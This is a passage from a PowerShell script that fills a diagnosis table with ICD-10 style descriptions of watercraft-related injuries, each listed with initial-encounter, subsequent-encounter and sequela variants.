fire","Burn due to other powered watercraft on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to other powered watercraft on fire","Burn due to other powered watercraft on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to other powered watercraft on fire","Burn due to other powered watercraft on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to sailboat on fire","Burn due to sailboat on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to sailboat on fire","Burn due to sailboat on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to sailboat on fire","Burn due to sailboat on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to canoe or kayak on fire","Burn due to canoe or kayak on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to canoe or kayak on fire","Burn due to canoe or kayak on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to canoe or kayak on fire","Burn due to canoe or kayak on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to (nonpowered) inflatable craft on fire","Burn due to (nonpowered) inflatable craft on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to (nonpowered) inflatable craft on fire","Burn due to (nonpowered) inflatable craft on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to (nonpowered) inflatable craft on fire","Burn due to (nonpowered) inflatable craft on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to water-skis on fire","Burn due to water-skis on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to water-skis on fire","Burn due to water-skis on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to water-skis on fire","Burn due to water-skis on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to other unpowered watercraft on fire","Burn due to other unpowered watercraft on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to other unpowered watercraft on fire","Burn due to other unpowered watercraft on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to other unpowered watercraft on fire","Burn due to other unpowered watercraft on fire, sequela") + $null = $DiagnosisList.Rows.Add("Burn due to unspecified watercraft on fire","Burn due to unspecified watercraft on fire, initial encounter") + $null = $DiagnosisList.Rows.Add("Burn due to unspecified watercraft on fire","Burn due to unspecified watercraft on fire, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Burn due to unspecified watercraft on fire","Burn due to unspecified watercraft on fire, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between merchant ship and other watercraft or other object due to collision","Crushed between merchant ship and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between merchant ship and other watercraft or other object due to collision","Crushed between merchant ship and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between merchant ship and other watercraft or other object due to collision","Crushed between merchant ship and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between passenger ship and other watercraft or other object due to collision","Crushed between passenger ship and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between passenger ship and other watercraft or other object due to collision","Crushed between passenger ship and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between passenger ship and other watercraft or other object due to collision","Crushed between passenger ship and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between fishing boat and other watercraft or other object due to collision","Crushed between fishing boat and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between fishing boat and other watercraft or other object due to collision","Crushed between fishing boat and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between fishing boat and other watercraft or other object due to collision","Crushed between fishing boat and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between other powered watercraft and other watercraft or other object due to collision","Crushed between other powered watercraft and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between other powered watercraft and other watercraft or other object due to collision","Crushed between other powered watercraft and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between other powered watercraft and other watercraft or other object due to collision","Crushed between other powered watercraft and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between sailboat and other watercraft or other object due to collision","Crushed between sailboat and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between sailboat and other watercraft or other object due to collision","Crushed between sailboat and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between sailboat and other watercraft or other object due to collision","Crushed between sailboat and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between canoe or kayak and other watercraft or other object due to collision","Crushed between canoe or kayak and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between canoe or kayak and other watercraft or other object due to collision","Crushed between canoe or kayak and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between canoe or kayak and other watercraft or other object due to collision","Crushed between canoe or kayak and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between (nonpowered) inflatable craft and other watercraft or other object due to collision","Crushed between (nonpowered) inflatable craft and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between (nonpowered) inflatable craft and other watercraft or other object due to collision","Crushed between (nonpowered) inflatable craft and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between (nonpowered) inflatable craft and other watercraft or other object due to collision","Crushed between (nonpowered) inflatable craft and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between other unpowered watercraft and other watercraft or other object due to collision","Crushed between other unpowered watercraft and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between other unpowered watercraft and other watercraft or other object due to collision","Crushed between other unpowered watercraft and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between other unpowered watercraft and other watercraft or other object due to collision","Crushed between other unpowered watercraft and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Crushed between unspecified watercraft and other watercraft or other object due to collision","Crushed between unspecified watercraft and other watercraft or other object due to collision, initial encounter") + $null = $DiagnosisList.Rows.Add("Crushed between unspecified watercraft and other watercraft or other object due to collision","Crushed between unspecified watercraft and other watercraft or other object due to collision, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Crushed between unspecified watercraft and other watercraft or other object due to collision","Crushed between unspecified watercraft and other watercraft or other object due to collision, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between merchant ship and other watercraft or other object","Fall due to collision between merchant ship and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between merchant ship and other watercraft or other object","Fall due to collision between merchant ship and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between merchant ship and other watercraft or other object","Fall due to collision between merchant ship and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between passenger ship and other watercraft or other object","Fall due to collision between passenger ship and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between passenger ship and other watercraft or other object","Fall due to collision between passenger ship and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between passenger ship and other watercraft or other object","Fall due to collision between passenger ship and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between fishing boat and other watercraft or other object","Fall due to collision between fishing boat and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between fishing boat and other watercraft or other object","Fall due to collision between fishing boat and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between fishing boat and other watercraft or other object","Fall due to collision between fishing boat and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between other powered watercraft and other watercraft or other object","Fall due to collision between other powered watercraft and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between other powered watercraft and other watercraft or other object","Fall due to collision between other powered watercraft and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between other powered watercraft and other watercraft or other object","Fall due to collision between other powered watercraft and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between sailboat and other watercraft or other object","Fall due to collision between sailboat and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between sailboat and other watercraft or other object","Fall due to collision between sailboat and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between sailboat and other watercraft or other object","Fall due to collision between sailboat and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between canoe or kayak and other watercraft or other object","Fall due to collision between canoe or kayak and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between canoe or kayak and other watercraft or other object","Fall due to collision between canoe or kayak and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between canoe or kayak and other watercraft or other object","Fall due to collision between canoe or kayak and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between (nonpowered) inflatable craft and other watercraft or other object","Fall due to collision between (nonpowered) inflatable craft and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between (nonpowered) inflatable craft and other watercraft or other object","Fall due to collision between (nonpowered) inflatable craft and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between (nonpowered) inflatable craft and other watercraft or other object","Fall due to collision between (nonpowered) inflatable craft and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Fall due to collision between unspecified watercraft and other watercraft or other object","Fall due to collision between unspecified watercraft and other watercraft or other object, initial encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between unspecified watercraft and other watercraft or other object","Fall due to collision between unspecified watercraft and other watercraft or other object, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Fall due to collision between unspecified watercraft and other watercraft or other object","Fall due to collision between unspecified watercraft and other watercraft or other object, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to merchant ship","Hit or struck by falling object due to accident to merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to merchant ship","Hit or struck by falling object due to accident to merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to merchant ship","Hit or struck by falling object due to accident to merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to passenger ship","Hit or struck by falling object due to accident to passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to passenger ship","Hit or struck by falling object due to accident to passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to passenger ship","Hit or struck by falling object due to accident to passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to fishing boat","Hit or struck by falling object due to accident to fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to fishing boat","Hit or struck by falling object due to accident to fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to fishing boat","Hit or struck by falling object due to accident to fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to other powered watercraft","Hit or struck by falling object due to accident to other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to other powered watercraft","Hit or struck by falling object due to accident to other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to other powered watercraft","Hit or struck by falling object due to accident to other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to sailboat","Hit or struck by falling object due to accident to sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to sailboat","Hit or struck by falling object due to accident to sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to sailboat","Hit or struck by falling object due to accident to sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to canoe or kayak","Hit or struck by falling object due to accident to canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to canoe or kayak","Hit or struck by falling object due to accident to canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to canoe or kayak","Hit or struck by falling object due to accident to canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to (nonpowered) inflatable craft","Hit or struck by falling object due to accident to (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to (nonpowered) inflatable craft","Hit or struck by falling object due to accident to (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to (nonpowered) inflatable craft","Hit or struck by falling object due to accident to (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to water-skis","Hit or struck by falling object due to accident to water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to water-skis","Hit or struck by falling object due to accident to water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to water-skis","Hit or struck by falling object due to accident to water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to other unpowered watercraft","Hit or struck by falling object due to accident to other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to other unpowered watercraft","Hit or struck by falling object due to accident to other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to other unpowered watercraft","Hit or struck by falling object due to accident to other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to unspecified watercraft","Hit or struck by falling object due to accident to unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to unspecified watercraft","Hit or struck by falling object due to accident to unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hit or struck by falling object due to accident to unspecified watercraft","Hit or struck by falling object due to accident to unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to merchant ship","Other injury due to other accident to merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to merchant ship","Other injury due to other accident to merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to merchant ship","Other injury due to other accident to merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to passenger ship","Other injury due to other accident to passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to passenger ship","Other injury due to other accident to passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to passenger ship","Other injury due to other accident to passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to fishing boat","Other injury due to other accident to fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to fishing boat","Other injury due to other accident to fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to fishing boat","Other injury due to other accident to fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to other powered watercraft","Other injury due to other accident to other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to other powered watercraft","Other injury due to other accident to other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to other powered watercraft","Other injury due to other accident to other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to sailboat","Other injury due to other accident to sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to sailboat","Other injury due to other accident to sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to sailboat","Other injury due to other accident to sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to canoe or kayak","Other injury due to other accident to canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to canoe or kayak","Other injury due to other accident to canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to canoe or kayak","Other injury due to other accident to canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to (nonpowered) inflatable craft","Other injury due to other accident to (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to (nonpowered) inflatable craft","Other injury due to other accident to (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to (nonpowered) inflatable craft","Other injury due to other accident to (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to water-skis","Other injury due to other accident to water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to water-skis","Other injury due to other accident to water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to water-skis","Other injury due to other accident to water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to other unpowered watercraft","Other injury due to other accident to other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to other unpowered watercraft","Other injury due to other accident to other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to other unpowered watercraft","Other injury due to other accident to other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to unspecified watercraft","Other injury due to other accident to unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to unspecified watercraft","Other injury due to other accident to unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other injury due to other accident to unspecified watercraft","Other injury due to other accident to unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off merchant ship","Drowning and submersion due to fall off merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off merchant ship","Drowning and submersion due to fall off merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off merchant ship","Drowning and submersion due to fall off merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off passenger ship","Drowning and submersion due to fall off passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off passenger ship","Drowning and submersion due to fall off passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off passenger ship","Drowning and submersion due to fall off passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off fishing boat","Drowning and submersion due to fall off fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off fishing boat","Drowning and submersion due to fall off fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off fishing boat","Drowning and submersion due to fall off fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off other powered watercraft","Drowning and submersion due to fall off other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off other powered watercraft","Drowning and submersion due to fall off other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off other powered watercraft","Drowning and submersion due to fall off other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off sailboat","Drowning and submersion due to fall off sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off sailboat","Drowning and submersion due to fall off sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off sailboat","Drowning and submersion due to fall off sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off canoe or kayak","Drowning and submersion due to fall off canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off canoe or kayak","Drowning and submersion due to fall off canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off canoe or kayak","Drowning and submersion due to fall off canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off (nonpowered) inflatable craft","Drowning and submersion due to fall off (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off (nonpowered) inflatable craft","Drowning and submersion due to fall off (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off (nonpowered) inflatable craft","Drowning and submersion due to fall off (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off water-skis","Drowning and submersion due to fall off water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off water-skis","Drowning and submersion due to fall off water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off water-skis","Drowning and submersion due to fall off water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off other unpowered watercraft","Drowning and submersion due to fall off other unpowered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off other unpowered watercraft","Drowning and submersion due to fall off other unpowered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off other unpowered watercraft","Drowning and submersion due to fall off other unpowered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off unspecified watercraft","Drowning and submersion due to fall off unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off unspecified watercraft","Drowning and submersion due to fall off unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to fall off unspecified watercraft","Drowning and submersion due to fall off unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of merchant ship","Drowning and submersion due to being thrown overboard by motion of merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of merchant ship","Drowning and submersion due to being thrown overboard by motion of merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of merchant ship","Drowning and submersion due to being thrown overboard by motion of merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of passenger ship","Drowning and submersion due to being thrown overboard by motion of passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of passenger ship","Drowning and submersion due to being thrown overboard by motion of passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of passenger ship","Drowning and submersion due to being thrown overboard by motion of passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of fishing boat","Drowning and submersion due to being thrown overboard by motion of fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of fishing boat","Drowning and submersion due to being thrown overboard by motion of fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of fishing boat","Drowning and submersion due to being thrown overboard by motion of fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of other powered watercraft","Drowning and submersion due to being thrown overboard by motion of other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of other powered watercraft","Drowning and submersion due to being thrown overboard by motion of other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of other powered watercraft","Drowning and submersion due to being thrown overboard by motion of other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of sailboat","Drowning and submersion due to being thrown overboard by motion of sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of sailboat","Drowning and submersion due to being thrown overboard by motion of sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of sailboat","Drowning and submersion due to being thrown overboard by motion of sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of canoe or kayak","Drowning and submersion due to being thrown overboard by motion of canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of canoe or kayak","Drowning and submersion due to being thrown overboard by motion of canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of canoe or kayak","Drowning and submersion due to being thrown overboard by motion of canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of (nonpowered) inflatable craft","Drowning and submersion due to being thrown overboard by motion of (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of (nonpowered) inflatable craft","Drowning and submersion due to being thrown overboard by motion of (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of (nonpowered) inflatable craft","Drowning and submersion due to being thrown overboard by motion of (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of unspecified watercraft","Drowning and submersion due to being thrown overboard by motion of unspecified watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of unspecified watercraft","Drowning and submersion due to being thrown overboard by motion of unspecified watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being thrown overboard by motion of unspecified watercraft","Drowning and submersion due to being thrown overboard by motion of unspecified watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from merchant ship","Drowning and submersion due to being washed overboard from merchant ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from merchant ship","Drowning and submersion due to being washed overboard from merchant ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from merchant ship","Drowning and submersion due to being washed overboard from merchant ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from passenger ship","Drowning and submersion due to being washed overboard from passenger ship, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from passenger ship","Drowning and submersion due to being washed overboard from passenger ship, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from passenger ship","Drowning and submersion due to being washed overboard from passenger ship, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from fishing boat","Drowning and submersion due to being washed overboard from fishing boat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from fishing boat","Drowning and submersion due to being washed overboard from fishing boat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from fishing boat","Drowning and submersion due to being washed overboard from fishing boat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from other powered watercraft","Drowning and submersion due to being washed overboard from other powered watercraft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from other powered watercraft","Drowning and submersion due to being washed overboard from other powered watercraft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from other powered watercraft","Drowning and submersion due to being washed overboard from other powered watercraft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from sailboat","Drowning and submersion due to being washed overboard from sailboat, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from sailboat","Drowning and submersion due to being washed overboard from sailboat, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from sailboat","Drowning and submersion due to being washed overboard from sailboat, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from canoe or kayak","Drowning and submersion due to being washed overboard from canoe or kayak, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from canoe or kayak","Drowning and submersion due to being washed overboard from canoe or kayak, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from canoe or kayak","Drowning and submersion due to being washed overboard from canoe or kayak, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from (nonpowered) inflatable craft","Drowning and submersion due to being washed overboard from (nonpowered) inflatable craft, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from (nonpowered) inflatable craft","Drowning and submersion due to being washed overboard from (nonpowered) inflatable craft, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from (nonpowered) inflatable craft","Drowning and submersion due to being washed overboard from (nonpowered) inflatable craft, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from water-skis","Drowning and submersion due to being washed overboard from water-skis, initial encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from water-skis","Drowning and submersion due to being washed overboard from water-skis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from water-skis","Drowning and submersion due to being washed overboard from water-skis, sequela") + $null = $DiagnosisList.Rows.Add("Drowning and submersion due to being washed overboard from other unpowered watercraft","Drowning and submersion due to being washed overboard from other unpowered watercraft, initial encounter") 